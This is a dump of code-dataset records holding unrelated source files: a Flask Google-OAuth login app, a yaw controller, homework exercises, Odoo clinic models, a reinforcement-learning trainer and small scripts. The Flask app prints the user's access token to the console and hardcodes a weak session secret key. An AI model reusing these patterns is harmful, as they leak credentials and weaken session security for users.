response.headers['Content-Type'] = 'application/json'\n        return response\n    # Obtain authorization code\n    code = request.data\n\n    try:\n        # Upgrade the authorization code into a 
credentials object\n        oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n        oauth_flow.redirect_uri = 'postmessage'\n        credentials = oauth_flow.step2_exchange(code)\n    except FlowExchangeError:\n        response = make_response(\n            json.dumps('Failed to upgrade the authorization code.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Check that the access token is valid.\n    access_token = credentials.access_token\n    url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n           % access_token)\n    h = httplib2.Http()\n    result = json.loads(h.request(url, 'GET')[1].decode('utf-8'))\n    # If there was an error in the access token info, abort.\n    if result.get('error') is not None:\n        response = make_response(json.dumps(result.get('error')), 500)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Verify that the access token is used for the intended user.\n    gplus_id = credentials.id_token['sub']\n    if result['user_id'] != gplus_id:\n        response = make_response(\n            json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Verify that the access token is valid for this app.\n    if result['issued_to'] != CLIENT_ID:\n        response = make_response(\n            json.dumps(\"Token's client ID does not match app's.\"), 401)\n        print(\"Token's client ID does not match app's.\")\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    stored_access_token = login_session.get('access_token')\n    stored_gplus_id = login_session.get('gplus_id')\n    if stored_access_token is not None and gplus_id == stored_gplus_id:\n        response = make_response(\n            json.dumps('Current user is already connected.'), 200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n    # Store the access token in the session for later use.\n    login_session['access_token'] = credentials.access_token\n    login_session['gplus_id'] = gplus_id\n\n    # Get user info\n    userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n    params = {'access_token': credentials.access_token, 'alt': 'json'}\n    answer = requests.get(userinfo_url, params=params)\n\n    data = answer.json()\n\n    login_session['username'] = data['name']\n    login_session['picture'] = data['picture']\n    login_session['email'] = data['email']\n\n    # see if user exists, if it doesn't make a new one\n    user_id = getUserID(login_session[\"email\"])\n    if not user_id:\n        user_id = createUser(login_session)\n    login_session[\"user_id\"] = user_id\n    return redirect(url_for(\"index\"))\n\n\n@app.route('/gdisconnect')\ndef gdisconnect():\n    access_token = login_session.get('access_token')\n    if access_token is None:\n        print('Access Token is None')\n        response = make_response(\n            json.dumps('Current user not connected.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    print('In gdisconnect access token is %s' % access_token)\n    print('User name is: ')\n    print(login_session['username'])\n    a_token = login_session['access_token']\n    url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % a_token\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[0]\n    print('result is ')\n    print(result)\n    if result['status'] == '200':\n        del login_session['access_token']\n        del login_session['gplus_id']\n        del login_session['username']\n        del login_session['email']\n        del login_session['picture']\n        response = make_response(json.dumps('Successfully disconnected.'), 200)\n        response.headers['Content-Type'] = 
'application/json'\n        return redirect(url_for(\"index\"))\n    else:\n        response = make_response(\n            json.dumps('Failed to revoke token for given user.', 400))\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n\nif __name__ == '__main__':\n    app.debug = False\n    app.secret_key = \"FSND\"\n    app.run(host='0.0.0.0', port=80)\n","sub_path":"catalog/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"316911554","text":"#!/usr/bin/env python\n# this line is just used to define the type of document\n\nimport numpy as np\nfrom yaw_rate_controllers import yaw_controller as yc\n\n\nclass SimpleTrackingYawController(yc.YawController):\n\n    @classmethod\n    def description(cls):\n        return \"Simple yaw tracking controller, based on feedback linearization of yaw rate equation\"\n\n    def __init__(self, gain = 1.0):\n        self.__gain = gain\n        \n        \n    def __str__(self):\n        string = yc.YawController.__str__(self)\n        string += \"\\nGain: \" + str(self.__gain)\n        return string\n\n\n    def output(self, state, state_desired):\n        # state = euler_angles in RAD + euler_angles_time_derivative in RAD/SEC\n        # state_desired = psi_desired in RAD + psi_desired_time_derivative in RAD/SEC\n        #return self.controller(state,state_desired)\n\n        #--------------------------------------#\n        # current phi and theta and psi\n        euler_angles = state[0:3]\n        phi = euler_angles[0]\n        theta = euler_angles[1]\n        psi = euler_angles[2]\n\n        euler_angles_time_derivative = state[3:6]\n        \n        phi_dot = euler_angles_time_derivative[0]\n        theta_dot = euler_angles_time_derivative[1]\n        psi_dot = euler_angles_time_derivative[2]\n\n        #--------------------------------------#\n        psi_star = state_desired[0]\n        psi_star_dot = state_desired[1]\n        psi_dot = psi_star_dot - self.__gain*np.sin(psi - psi_star)\n        yaw_rate = 1.0/np.cos(phi)*(np.cos(theta)*psi_dot - np.sin(phi)*theta_dot)\n        \n        return yaw_rate\n\n\n# \"\"\"Test\"\"\"\n# \n#string = TrackingYawController.parameters_to_string()\n#print string\n#parameters = TrackingYawController.string_to_parameters(string)\n#print parameters\n#controller = TrackingYawController(parameters)\n#print controller\n#output = controller.output(np.zeros(6), np.ones(2))\n#print output\n\n\n\n\n\n","sub_path":"quad_control/src/yaw_rate_controllers/simple_tracking_yaw_controller/simple_tracking_yaw_controller.py","file_name":"simple_tracking_yaw_controller.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"478959648","text":"__author__ = ' Барсанов Сергей Сергеевич '\n\n\n# Solve all the tasks in this block using list comprehensions!\n\n# Task 1:\n# Given a list filled with arbitrary integers. 
\n# Produce a new list whose elements are\n# the squares of the elements of the original list\n# [1, 2, 4, 0] --> [1, 4, 16, 0]\n\nlist1 = [int(i) for i in (1, 2, 4, 6, 23, -2)]\nlist2 = [i**2 for i in list1]\nprint(list2)\n\n\n# Task 2:\n# Two lists of fruits are given.\n# Produce a list of the fruits present in both source lists.\nfruits1 = ['апельcин', 'алыча', 'яблоко', 'персик', 'карамбола', 'банан', 'чупа-чупа']\nfruits2 = ['апельcин', 'банан', 'карамбола', 'грумичама', 'алыча', 'чупа-чупа', 'персик', 'киви', 'манго', 'лимон']\nfruits_list = [elem for elem in fruits1 if elem in fruits2]\nprint(fruits_list)\n# Task 3:\n# A list filled with arbitrary numbers is given.\n# Produce a list of the elements of the original that satisfy the following conditions:\n# + The element is a multiple of 3\n# + The element is positive\n# + The element is not a multiple of 4\n\nnumb_list1 = [int(i) for i in (3, 2, 24, -94, -21, 23, 81, 954, 0, 3265)]\nnumb_list2 = [int(i) for i in numb_list1 if i > 0 and i % 3 == 0 and i % 4 != 0]\nprint('Список, удовлетворяющий указанным условиям: ', numb_list2)","sub_path":"hw_les04_easy.py","file_name":"hw_les04_easy.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"333451296","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\n\nfrom odoo import api, fields, models, _\nfrom odoo.tools import ustr\nfrom odoo.exceptions import UserError\n\nSEXE = [\n    ('m', 'M'),\n    ('f', 'F'),\n]\n\nTYPE_DENT = [\n    ('11','11'),\n    ('12','12'),\n    ('13','13'),\n    ('14','14'),\n    ('15','15'),\n    ('16','16'),\n    ('17','17'),\n    ('18','18'),\n    ('21','21'),\n    ('22','22'),\n    ('23','23'),\n    ('24','24'),\n    ('25','25'),\n    ('26','26'),\n    ('27','27'),\n    ('28','28'),\n    ('31','31'),\n    ('32','32'),\n    ('33','33'),\n    ('34','34'),\n    ('35','35'),\n    ('36','36'),\n    ('37','37'),\n    ('38','38'),\n    ('41','41'),\n    ('42','42'),\n    ('43','43'),\n    ('44','44'),\n    ('45','45'),\n    ('46','46'),\n    ('47','47'),\n    ('48','48'),\n    \n    ('51','51'),\n    ('52','52'),\n    ('53','53'),\n    ('54','54'),\n    ('55','55'),\n    ('61','61'),\n    ('62','62'),\n    ('63','63'),\n    ('64','64'),\n    ('65','65'),\n    ('71','71'),\n    ('72','72'),\n    ('73','73'),\n    ('74','74'),\n    ('75','75'),\n    ('81','81'),\n    ('82','82'),\n    ('83','83'),\n    ('84','84'),\n    ('85','85'),\n]\n\n# ---------------------------------------------------------\n# Patient Info\n# ---------------------------------------------------------\nclass PatientInfo(models.Model):\n    _name = \"gestion.clinique.patient.info\"\n    _description = \"La fiche patient\"\n    _order = \"sequence\"\n\n    sequence = fields.Char(string='Code Patient', readonly=True)\n    name = fields.Char(string='Nom', required=True)\n    firstname = fields.Char(string='Prénom', required='True')\n    age = fields.Integer(string=\"Age\")\n    sexe = fields.Selection(SEXE, String='Sexe')\n    adresse = fields.Char(String='Adresse')\n    numero_telephone = fields.Char(string=\"Numéro de téléphone\")\n\n    @api.model\n    @api.returns('self', lambda value: value.id)\n    def create(self, vals):\n        vals['sequence'] = self.env['ir.sequence'].get('gestion.clinique.patient.info')\n        res = super(PatientInfo, self).create(vals) \n        return res\n\n    @api.multi\n    def name_get(self):\n        result = []\n        for record in self:\n            if record.name:\n                name = record.name \n            if record.name and record.firstname:\n                name = record.firstname +' '+record.name\n            if record.sequence and record.name:\n                name = record.sequence +' '+record.name\n            if record.sequence and record.name and record.firstname:\n                name = record.sequence +' 
'+record.name+' '+record.firstname\n result.append((record.id, name))\n return result\n \n# ---------------------------------------------------------\n# Patient\n# ---------------------------------------------------------\nclass PATIENT(models.Model):\n _name = \"gestion.clinique.patient\"\n _description = \"La fiche patient\"\n\n date_consultation = fields.Date(string=\"Date Consultation\")\n motif_consultation = fields.Char(string='Motif de la consultation')\n antecedents = fields.Text(string='Antécédents')\n femme_enceinte = fields.Boolean(string=\"Femme enceinte\")\n observation = fields.Text(string='Obervation')\n\n patient_info_id = fields.Many2one('gestion.clinique.patient.info', string='Patient', required=True)\n\n patient_rdv_ids = fields.One2many('gestion.clinique.patient.rdv', 'patient_id', string='Patient RDV')\n radiographie_ids = fields.One2many('gestion.clinique.radiographie', 'patient_id', string='Radiographie')\n diagnostic_ids = fields.One2many('gestion.clinique.diagnostic', 'patient_id', string='Diagnostic')\n traitement_ids = fields.One2many('gestion.clinique.traitement', 'patient_id', string='Traitement')\n\n\n\n @api.model\n @api.returns('self', lambda value: value.id)\n def create(self, vals):\n vals['date_consultation'] = str(date.today())\n res = super(PATIENT, self).create(vals) \n return res\n\n @api.multi\n def write(self, vals):\n rep = super(PATIENT, self).write(vals)\n return rep\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n if record.patient_info_id.name:\n name = record.patient_info_id.name \n if record.patient_info_id.name and record.patient_info_id.firstname:\n name = record.patient_info_id.firstname +' '+record.patient_info_id.name\n if record.patient_info_id.sequence and record.patient_info_id.name:\n name = record.patient_info_id.sequence +' '+record.patient_info_id.name\n if record.patient_info_id.sequence and record.patient_info_id.name and record.patient_info_id.firstname:\n name = record.patient_info_id.sequence +' '+record.patient_info_id.name+' '+record.patient_info_id.firstname\n result.append((record.id, name))\n return result\n\nclass PatientRDV(models.Model):\n _name = \"gestion.clinique.patient.rdv\"\n _description = \"RDV Patient\"\n\n currency_id = fields.Many2one('res.currency', 'Currency', required=True,\\\n default=lambda self: self.env.user.company_id.currency_id.id)\n\n sequence_rdv = fields.Char('Sequence', compute='compute_numero_rdv', store=True)\n date_rdv = fields.Date(string='Date', required=True)\n avance = fields.Monetary()\n reste = fields.Monetary()\n\n patient_id = fields.Many2one('gestion.clinique.patient', string='Patient', required=True)\n mes_rendez_vous_id = fields.Many2one('mes.rendez.vous', string='Mes rendez vous')\n \n @api.multi\n @api.depends('patient_id')\n def compute_numero_rdv(self):\n for patient in self.mapped('patient_id'):\n number = 0\n for line in patient.patient_rdv_ids:\n line.sequence_rdv = 'RDV ' + str(number)\n number += 1\n\n @api.model\n @api.returns('self', lambda value: value.id)\n def create(self, vals):\n res = super(PatientRDV, self).create(vals) \n return res\n\n @api.multi\n def write(self, vals):\n rep = super(PatientRDV, self).write(vals)\n return rep\n\nclass Radiographie(models.Model):\n _name = \"gestion.clinique.radiographie\"\n _description = \"Radiographie\"\n\n lien = fields.Char(string=\"Lien\", required=True)\n nom = fields.Char()\n commentaire = fields.Char()\n\n patient_id = fields.Many2one('gestion.clinique.patient', 
string='Radiographie')\n\nclass PatientDiagnostic(models.Model):\n _name = \"gestion.clinique.diagnostic\"\n _description = \"Diagnostic\"\n\n type = fields.Selection(TYPE_DENT,string=\"Type dent\", required=True)\n nom = fields.Char(string='Nom', required=True)\n\n patient_id = fields.Many2one('gestion.clinique.patient', string='Diagnostic')\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n name = record.type +' '+ record.nom \n result.append((record.id, name))\n return result\n\nclass PatientTraitement(models.Model):\n _name = \"gestion.clinique.traitement\"\n _description = \"Traitement\"\n\n type = fields.Selection(TYPE_DENT,string=\"Type dent\", required=True)\n nom = fields.Char(string='Nom', required=True)\n\n patient_id = fields.Many2one('gestion.clinique.patient', string='Traitement')\n\n @api.multi\n def name_get(self):\n result = []\n for record in self:\n name = record.type +' '+record.nom \n result.append((record.id, name))\n return result\n\n\n","sub_path":"gestion_clinique/models/gestion_clinique_patient.py","file_name":"gestion_clinique_patient.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"348818585","text":"##scores = [0, 31, 27, 31, 49, 21, 17, 25]\n##\n##wins = 0\n##losses = 0\n##for i in range(0, len(scores), 2):\n## if (scores[i] > scores[i+1]):\n## wins += 1\n## elif (scores[i] < scores[i+1]):\n## losses += 1\n## else:\n## pass\n##\n##print(\"MSU has\", wins, \"win(s) and\", losses, \"loss(es)\")\n\nf = open('town-and-country.in', 'r')\n\ndef grocery_bill(file_name):\n for items in f:\n items = line.split()\n print(\"The total bill = $ \" + sum(items))\n","sub_path":"PRACTICUMS/practicum-1-practice-2.py","file_name":"practicum-1-practice-2.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"284824022","text":"import os\nimport sys\nimport subprocess\n\ndownload_script = \"src_internalDB.py\"\ndb_file = \"cwe94.json\"\n\nanalysis_script = os.path.join(\"syntax-search\", \"syntaxSearchTool_V2.js\")\nanalysis_target = os.path.join(os.getcwd(), \"new_package_src\")\n\nif __name__ == \"__main__\":\n download_command = \"python \" + download_script + \" \" + db_file\n download_output = subprocess.Popen(download_command, stderr=subprocess.STDOUT, shell=True)\n while download_output.poll() is None:\n if not download_output.stdout: continue\n line = download_output.stdout.readline()\n if not line: continue\n print(line)\n\n analysis_command = \"node \" + analysis_script + \" \\\"\" + analysis_target + \"\\\"\"\n analysis_output = subprocess.Popen(analysis_command, stderr=subprocess.STDOUT, shell=True)\n while analysis_output.poll() is None:\n if not analysis_output.stdout: continue\n line = analysis_output.stdout.readline()\n if not line: break\n print(line)\n","sub_path":"Tools/search/full_platform.py","file_name":"full_platform.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"449394909","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 4 10:51:54 2018\n\n@author: matthewszhang\n\"\"\"\nimport time\nimport os\nimport os.path as osp\nimport numpy as np\nfrom collections import deque\nfrom baselines.feudal.models import FeudalModel, RecurrentFeudalModel, I2AModel\nfrom baselines.feudal.runners import FeudalRunner, 
I2ARunner, TestRunner\nfrom baselines.program.decode import decode_index, decode\nfrom baselines.program.mlogger import Logger\nfrom baselines.feudal.utils import sf01, fl01\n\nPATH=\"tmp/build/graph\"\n \ndef num(l):\n N_NUMS = len(l)\n val = 0\n for i in range(N_NUMS):\n val += l[i] * (N_NUMS ** (N_NUMS - 1 - i))\n return val\n\ndef sort_by_state(scalars, encoded_states, env):\n scalar_dict = {}\n for i in range(len(encoded_states)):\n for j in range(encoded_states[i].shape[0]):\n state = num(decode(encoded_states[i][j])['state'])\n if state in scalar_dict:\n scalar_dict[state][1] = (scalar_dict[state][0] * scalar_dict[state][1] + scalars[i][j][1]) \\\n /(scalar_dict[state][0] + 1)\n scalar_dict[state][0] += 1\n else:\n scalar_dict[state] = [1,scalars[i][j][1]]\n return scalar_dict\n\ndef sort_by_time(scalars, neplength):\n scalar_dict = {}\n for i in range(len(scalars)):\n for j in range(neplength):\n if j in scalar_dict:\n try:\n scalar_dict[j][1] = (scalar_dict[j][0] * scalar_dict[j][1] + scalars[i][j][1]) \\\n /(scalar_dict[j][0] + 1)\n scalar_dict[j][0] += 1\n except:\n continue\n else:\n try:\n scalar_dict[j] = [1, scalars[i][j][1]]\n except:\n continue\n return scalar_dict\n\ndef invalids_by_goal(goals):\n invalids = []\n for i in range(goals.shape[0]):\n if np.all(goals[i] == 0.0):\n invalids.append(i)\n return invalids\n\ndef decode_trajectories(states):\n trajectory = []\n for i in range(states.shape[0]):\n trajectory.append(decode(states[i]))\n return trajectory\n \ndef pad(arr, minsize): # arr must be at least minsize\n nbatch = arr.shape[0]\n d = minsize - nbatch\n if d > 0:\n rep = [1]*(nbatch-1)+[d+1]\n arr = np.repeat(arr, rep, axis=0)\n return arr\n\ndef sbi(arr, dones):\n nbatch=dones.shape[0]\n abd=[]\n si=0\n for t in range(nbatch):\n if dones[t] == 1:\n abd.append(arr[si:t+1])\n si=t+1\n elif t==nbatch-1:\n abd.append(arr[si:])\n return abd\n\ndef pack(arr):\n try:\n arr = np.vstack(arr)\n if arr.shape[0]==1:\n return np.flatten(arr)\n else: return arr\n except:\n return np.hstack(arr)\n\ndef constfn(val):\n def f(_):\n return val\n return f\n\ndef mcret(actions, rews, dones, vals, lam=0.95, gam=0.99):\n mb_returns = np.zeros_like(rews)\n mb_advs = np.zeros_like(rews)\n lastgaelam = 0\n nsteps = rews.shape[0]\n nextvalues=vals[-1:,]\n print(nsteps)\n for t in reversed(range(nsteps)):\n if t == nsteps - 1:\n nextnonterminal = 0\n nextvalues = 0 # assume last is terminal -> won't be too significant unless tstep is large\n else:\n nextnonterminal = 1.0 - dones[t+1]\n nextvalues = vals[t+1]\n delta = rews[t] + gam * nextvalues * nextnonterminal - vals[t]\n mb_advs[t] = lastgaelam = delta + gam * lam * nextnonterminal * lastgaelam\n \n mb_returns = mb_advs + vals\n return mb_returns, mb_advs\n\ndef recurrent_mcret(actions, rews, dones, vals, lam=0.95, gam=0.99):\n mb_returns = np.zeros_like(rews)\n mb_advs = np.zeros_like(rews)\n lastgaelam = 0\n nsteps = rews.shape[1]\n nextvalues=vals[:,-1:,]\n for t in reversed(range(nsteps)):\n if t == nsteps - 1:\n nextnonterminal = 0\n nextvalues = 0 # assume last is terminal -> won't be too significant unless tstep is large\n else:\n nextnonterminal = 1.0\n nextvalues = vals[:,t+1,:]\n delta = rews[:,t,:] + gam * nextvalues * nextnonterminal - vals[:,t,:]\n mb_advs[:,t,:] = lastgaelam = delta + gam * lam * nextnonterminal * lastgaelam\n \n mb_returns = mb_advs + vals\n return mb_returns, mb_advs\n\ndef safe_vstack(arr, dim1):\n assert arr\n shape = arr[0].shape\n return np.reshape(np.vstack(arr), (dim1,) + shape)\n \ndef learn(*, 
policy, env, tsteps, nsteps, encoef, lr, cliphigh, clipinc, vcoef,\n mgn, gmax, ginc, lam, nhier, nmb, noe, ngmin, nginc, bmin, bmax, nhist,\n recurrent, cos, val, fixed_manager, fixed_agent, goal_state, ts,\n cm, nhidden=64, max_len=100,\n save_interval=0, log_interval=1, test_interval=1, test_env=None,\n logger=None, load_path=None):\n \n if isinstance(lr, float): lr = constfn(lr)\n else: assert callable(lr)\n if isinstance(cliphigh, float):\n arr = np.asarray([cliphigh*(clipinc**i) for i in range(nhier)], dtype=np.float32) \n cliprange = constfn(arr)\n else: \n def cr(t):\n arr = [cliphigh(t)*(clipinc(t)**i) for i in range(nhier)]\n return np.asarray(arr, dtype=np.float32)\n cliprange = cr \n if isinstance(encoef, float):\n lr = constfn(encoef)\n else:\n assert callable(encoef)\n\n neplength = max_len\n ob_space = env.observation_space\n ac_space = env.action_space\n assert nsteps%max_len == 0\n if recurrent:\n nbatch = nsteps//max_len\n else:\n nbatch = nsteps\n nupdates = tsteps//nsteps\n nbatch_train = nbatch // nmb\n \n def ng(k):\n return ngmin * (nginc **(nhier - k))\n def gamma(k):\n return 1 - (gmax * (ginc ** (nhier - 1 - k)))\n def nh(k):\n return nhist ** (k)\n def beta(k):\n if nhier==1:\n return bmin \n else:\n return bmin + (bmax - bmin) * k / (nhier - 1)\n \n if recurrent:\n make_model = lambda : RecurrentFeudalModel(policy, env, ob_space, ac_space,\n neplength=neplength, max_grad=mgn,\n ngoal=ng, recurrent=recurrent, g=gamma, nhist=nh, b=beta, nhier=nhier,\n val=val, cos=cos, fixed_agent=fixed_agent, fixed_network=fixed_manager, goal_state=goal_state,\n encoef=encoef, vcoef=vcoef, nh=nhidden, train_supervised=ts)\n else:\n make_model = lambda : FeudalModel(policy, env, ob_space, ac_space, max_grad=mgn,\n ngoal=ng, recurrent=recurrent, g=gamma, nhist=nh, b=beta, nhier=nhier,\n val=val, cos=cos, fixed_agent=fixed_agent, fixed_network=fixed_manager, goal_state=goal_state,\n encoef=encoef, vcoef=vcoef, nh=nhidden, train_supervised=ts)\n model = make_model()\n if load_path is not None:\n model.load(load_path)\n \n runner = FeudalRunner(env=env, model=model, nsteps=max_len, \n recurrent=recurrent, fixed_manager=fixed_manager,\n fixed_agent=fixed_agent)\n test_runner = FeudalRunner(env=test_env, model=model, nsteps=max_len,\n recurrent=recurrent, fixed_manager=fixed_manager,\n fixed_agent=fixed_agent)\n epinfobuf = deque(maxlen=100)\n tfirststart = time.time()\n \n state_rew_logger = Logger(dir=logger.dir, output_format=['CSV'], csv_tag='sinrs.csv')\n time_rew_logger = Logger(dir=logger.dir, output_format=['CSV'], csv_tag='tinrs.csv')\n test_run_logger = Logger(dir=logger.dir, output_format=['TXT'], txt_tag='test_traj.txt')\n \n if not val:\n vre = np.zeros((nhier), dtype=np.float32)\n val_temp = 0.9\n \n for update in range(1, nupdates+1):\n tstart = time.time()\n frac = 1.0 - (update - 1.0) / nupdates\n lrnow = lr(frac)\n cliprangenow = cliprange(frac)\n encoefnow = encoef(frac)\n print(encoefnow, frac)\n obs, rewards, actions, dones, mbpi, init_goals, goals, s_actions, states, epinfos = runner.run()\n trun = time.time()\n print(trun - tstart)\n epinfobuf.extend(epinfos)\n mblossvals = []\n \n if not recurrent:\n rewards, vfs, nlps, inrs, fvecs, sparse_inrs = \\\n model.av(obs, actions, rewards, dones, goals, states, init_goals)\n #print(inrs)\n #print(\"num of frames: {}\".format(len(inrs)))\n #print(\"num of frames: {}\".format(len(sparse_inrs)))\n #print(sparse_inrs)\n #print([np.concatenate((i,j), 1) for i,j in zip(inrs, sparse_inrs)])\n #print(inrs)\n tstats = 
time.time()\n print(tstats - trun)\n #perform tally for each unique goal\n if fixed_manager and nhier > 1:\n inrs_per_goal = sort_by_state(inrs, init_goals, env)\n \n for index,i in enumerate(inrs_per_goal.items()):\n state_rew_logger.logkv(\"{}\".format(i[0]), i[1][1])\n state_rew_logger.dumpkvs()\n \n inrs_per_timestep = sort_by_time(inrs, neplength)\n for index,i in enumerate(inrs_per_timestep.items()):\n time_rew_logger.logkv(\"{}\".format(index), i[1][1])\n time_rew_logger.dumpkvs()\n rewards, vfs, nlps, inrs, fvecs, sparse_inrs = \\\n map(np.asarray,(rewards, vfs, nlps, inrs, fvecs, sparse_inrs))\n states = states[:,np.newaxis,:]\n states = np.tile(states, (1, neplength, *np.ones_like(states.shape[2:])))\n obs, actions, dones, mbpi, init_goals, goals, states, rewards, \\\n vfs, nlps, inrs, fvecs, s_actions, sparse_inrs = \\\n (fl01(arr) for arr in (obs, actions, dones,\n mbpi, init_goals, goals, states, rewards,\n vfs, nlps, inrs[:,1:,:], fvecs, s_actions, sparse_inrs))\n \n number_of_correct = np.sum(np.where(inrs[:,-1] > 0.99, True, False))\n if not val:\n vre = vre * val_temp + np.mean(rewards, axis=0) * (1-val_temp)\n vfs = np.reshape(np.repeat(vre, nsteps), [nsteps, nhier])\n rewards, advs = mcret(actions, rewards, dones, vfs, lam=lam, gam=model.gam)\n actions = actions.flatten() #safety\n inds = np.arange(nbatch)\n #invalid_inds = np.array(invalids_by_goal(goals))\n #print(invalid_inds.shape[0])\n #valid_inds = np.setdiff1d(np.arange(init_goals.shape[0]), invalid_inds)\n invalid_inds = []\n valid_inds = inds\n mean_inr = np.mean(inrs[valid_inds], axis=0)\n print(mean_inr.shape)\n mean_sparse_inr = np.mean(sparse_inrs[valid_inds], axis=0)\n if nhier == 1:\n goals = np.zeros((nbatch, 0, model.maxdim))\n \n sample = np.random.randint(0, nbatch)\n #print(decode(obs[sample]), s_actions[sample])\n #print(rewards[:40,1])\n for _ in range(noe):\n np.random.shuffle(inds)\n for start in range(0, nbatch, nbatch_train):\n end = start + nbatch_train\n mbinds = inds[start:end]\n mbinds_deleted = [i for i in mbinds if i not in invalid_inds]\n slices = (arr[mbinds_deleted] for arr in (\n obs, actions, rewards, advs, goals, nlps,\n fvecs, vfs, states, s_actions, init_goals)) \n #slices = (arr[mbinds] for arr in (obs, actions, rewards, advs, goals, nlps, vfs, states, init_goals)) \n #print(\"lrnow: {}, clipnow: {}\".format(lrnow, cliprangenow))\n mblossvals.append(model.train(lrnow, cliprangenow, encoefnow, *slices))\n \n ttrain = time.time()\n print(ttrain - tstats)\n\n else: # recurrent version\n rewards, vfs, nlps, inrs = model.av(obs, actions, rewards, dones, goals, states, init_goals)\n pre_vars = (obs,actions,rewards,dones,goals,nlps,vfs,states,inrs,init_goals) \n map_vars = (safe_vstack(arr, nbatch) for arr in pre_vars)\n (obs,actions,rewards,dones,goals,nlps,vfs,states,inrs,init_goals) = map_vars\n \n if not val:\n vre = vre * val_temp + np.apply_over_axes(np.mean, rewards, [0,1]) * (1-val_temp)\n vfs = np.reshape(np.repeat(vre, nbatch*neplength), [nbatch, neplength, nhier])\n rewards, advs = recurrent_mcret(actions, rewards, dones, vfs, lam=lam, gam=model.gam)\n \n feed_vars = (obs, actions, rewards, advs, goals, nlps, vfs, states, init_goals)\n mean_inr = np.mean(inrs, axis=(0,1))\n inds = np.arange(nbatch)\n for _ in range(noe):\n np.random.shuffle(inds)\n for start in range(0, nbatch, nbatch_train):\n end = start + nbatch_train\n mbinds = inds[0:nbatch_train]\n slices = (arr[mbinds] for arr in feed_vars)\n mblossvals.append(model.train(lrnow, cliprangenow, *slices))\n\n if update == 
1 or update % test_interval == 0:\n obs, rewards, actions, dones, mbpi, init_goals, goals, s_actions, states, kepinfos = test_runner.run()\n rewards, vfs, nlps, inrs, vecs, sparse_inrs = \\\n model.av(obs, actions, rewards, dones, goals, states, init_goals)\n trajectories = decode_trajectories(obs[0,:-1])\n test_run_logger.logkv('update_number', update)\n for i in range(len(trajectories)):\n test_run_logger.logkv('state_{}'.format(i), '{}'.format(trajectories[i]))\n test_run_logger.logkv('goal_{}'.format(i), '{}'.format(decode(init_goals[0][i])))\n test_run_logger.logkv('inr_{}'.format(i), '{}'.format(inrs[0][i+1]))\n test_run_logger.logkv('act_{}'.format(i), '{}'.format(actions[0][i]))\n test_run_logger.logkv('s_act_{}'.format(i), '{}'.format(s_actions[0][i]))\n test_run_logger.dumpkvs()\n\n lossvals = np.mean(mblossvals, axis=0)\n tnow = time.time()\n fps = int(nbatch / (tnow - tstart))\n if update % log_interval == 0 or update == 1:\n if logger is not None:\n logger.logkv(\"serial_timesteps\", update*nsteps)\n logger.logkv(\"nupdates\", update)\n logger.logkv(\"total_timesteps\", update*nbatch)\n logger.logkv(\"fps\", fps)\n logger.logkv(\"exact_matches\", number_of_correct)\n for i in range(1, nhier):\n logger.logkv('intrinsic_reward_{}'.format(i), mean_inr[i] * neplength/(neplength - 1))\n if fixed_manager:\n logger.logkv('intrinsic_reward_sparse_{}'.format(i), mean_sparse_inr[i] * neplength/(neplength - 1))\n logger.logkv('eprewmean', safemean([epinfo['r'] for epinfo in epinfobuf]))\n logger.logkv('eplenmean', safemean([epinfo['l'] for epinfo in epinfobuf]))\n logger.logkv('time_elapsed', tnow - tfirststart)\n for (lossval, lossname) in zip(lossvals, model.loss_names):\n logger.logkv(lossname, lossval)\n logger.dumpkvs()\n env.close()\n\ndef safemean(xs):\n return np.nan if len(xs) == 0 else np.mean(xs)\n\n \n\n \n","sub_path":"baselines/feudal/feudal.py","file_name":"feudal.py","file_ext":"py","file_size_in_byte":15626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"623795996","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\nimport matplotlib\nfrom datetime import datetime\nfilename='/Users/linfan/projects/zzd/t_S_Data/1$1S6350_copy'\na=0.7\nc='crimson'\nd='steelblue'\nl=1.5\nmaxi=995\nmini=504\nnumbers=[]\ntime =[]\ntemp=[]\nsalinity=[]\ndate = []\nfor line in file(filename):\n info = line.split()\n numbers.append(info[0])\n date.append(info[1])\n time.append(info[2])\n temp.append(info[3])\n salinity.append(info[4])\nfor i in range(0,len(temp)):\n temp[i]=float(temp[i].replace(',','.'))\n salinity[i]=float(salinity[i].replace(',','.')) \n date[i] = str(date[i].replace('.','-'))\n date[i] = date[i] + ' ' + time[i]\n date[i] = datetime.strptime(date[i],'%d-%m-%y 